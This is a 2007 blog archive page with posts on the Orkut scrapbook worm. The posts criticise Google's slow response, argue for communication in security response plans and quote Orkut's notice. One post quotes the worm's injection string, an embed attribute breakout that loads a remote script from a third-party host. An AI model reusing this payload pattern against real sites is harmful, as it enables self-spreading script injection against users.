Privacy: December 2007 Archives

Orkut Responds — Thoughts About Response Plans

By Kee Hinckley on December 24, 2007 1:22 PM | | Comments (0)

Orkut finally posted a notice about the worm. I certainly appreciate that they worked quickly on fixing the problem. However, I still believe there should have been an ongoing dialog with their users. When you put together a security response plan, you need to include not only an engineering team, but also P.R. resources to handle communicating with the outside world. "Trust" is the most important commodity a social network has. The panic you feel when you think your accounts, and perhaps computer, are infected, is not going to be erased by an after-the-fact message two days later. All social networks should have a plan in place that includes (at a minimum) telling people that a solution is being developed, and ideally includes periodic updates on the progress. Providing additional information about the problem as it becomes available would also be great, but the primary goal is to show that users' concerns are being taken seriously, and that people are actively working to fix the problem. Responsiveness, concern, and information, will help ensure that people maintain their trust in your service.

Security Reminder Orkut Blog

Security Reminder

Thursday, December 20, 2007 1:53 PM

Posted by Sergio Marti, Software Engineer

This week, the orkut team discovered that a user had exploited a bug in our scrapbook feature. As a result, many of you likely received scraps from friends of yours that they actually didn't send, and friends may have received scraps that appeared to come from you.

The orkut team responded quickly, and worked late into the night to fix the underlying issue and contain the spread of these scraps.

We believe that this action has been effectively stopped and you should no longerreceive any more of these unintended messages. We appreciate your understanding in this case and hope that this did not create too much of an inconvenience for you or your fellow orkut friends.

Orkut Worm Code (and why was Google so slow to respond?)

By Kee Hinckley on December 19, 2007 2:44 PM | | Comments (1)

I had to head off and get some sleep last night, so I didn't have time to try and track this down, but others did. I've attached the javascript code below for those who want to see it.

I have to say, I'm disappointed by Google's response time on this issue. I noticed the problem Tuesday evening around 10 or 11pm EST. As soon as I knew it was a worm I posted a support request to Orkut (which, btw, is not easy—they keep redirecting you to tips on protecting your computer). Once I had more details and posted my original link, I filed another report, this time through a security form (although the only way to do so was to claim that my account had been compromised). That was between midnight and 1am EST. This morning when I went to check around 7am EST, the worm was still spreading.

I would have hoped that they could have gotten the reports, paged the appropriate people, and then turned off scrapbooks, or disabled HTML scrapbooks, until things were under control. If that wasn't possible (and I understand that making on-the-fly code changes to a large distributed system is not always the simplest thing), then they should have shut Orkut down. And at the very least, I would expect to see an explanation and apology on Orkut.

The issue isn't whether or not the worm was dangerous. The issue is that I now don't trust Google to respond quickly the next time there's a worm. And the next one might not be so benign.

Ironically, this has caused a number of my friends (who like myself, haven't used Orkut in quite a while) to update their profiles. It may even increase Orkut's overall traffic in the States, since they've largely been forgotten here.

The original source file is no longer in place, so the worm has hopefully stopped. Since Google has posted nothing about it on the Orkut site or blog, I have no idea whether the underlying flaw has been fixed.

Looking at the code, my guess is that the hole is here:

"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\"width=\"1\" height=\"1\"></embed>";

There is a "script" attribute provided to the embed of a Flash video. Letting the script element through allowed for arbitrary javascript execution in the context of the scrapbook page. Definitely not a good thing. It would certainly be possible for such a script to do quite a bit of damage. I'm sure there are more detailed examinations of the problem on the net. Searching around it's clear that this is probably the third variation of the exploit that has been used in recent days.

Javascript code can be found below the fold.

Continue reading Orkut Worm Code (and why was Google so slow to respond?).
« Privacy: October 2007 | Main Index | Archives | Privacy: January 2008 »

About this Archive

This page is a archive of entries in the Privacy category from December 2007.

Privacy: October 2007 is the previous archive.

Privacy: January 2008 is the next archive.

Find recent content on the main index or look in the archives to find all content.

Subscribe via Reader

 Subscribe to TechnoSocial

Subscribe via Email

Enter your email address:

Delivered by FeedBurner

About Me

I'm the CEO/CTO of Somewhere, Inc., a company building a unified social networking layer that gives people the means to track their friends across multiple social networks.

Privacy: December 2007: Monthly Archives

Categories

Creative Commons License
This weblog is licensed under a Creative Commons License.